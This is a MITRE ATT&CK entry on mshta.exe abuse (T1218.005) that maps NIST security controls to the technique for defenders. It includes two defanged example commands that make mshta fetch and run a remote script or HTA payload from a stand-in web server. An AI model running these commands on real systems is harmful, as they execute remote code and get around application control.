T1218.005 Mshta Mappings

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

View in MITRE ATT&CK®

Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name
CM-2 Baseline Configuration Protects T1218.005 Mshta
CM-6 Configuration Settings Protects T1218.005 Mshta
CM-7 Least Functionality Protects T1218.005 Mshta
CM-8 System Component Inventory Protects T1218.005 Mshta
RA-5 Vulnerability Monitoring and Scanning Protects T1218.005 Mshta
SI-10 Information Input Validation Protects T1218.005 Mshta
SI-4 System Monitoring Protects T1218.005 Mshta
SI-7 Software, Firmware, and Information Integrity Protects T1218.005 Mshta
action.hacking.variety.Abuse of functionality Abuse of functionality related-to T1218.005 Signed Binary Proxy Execution: Mshta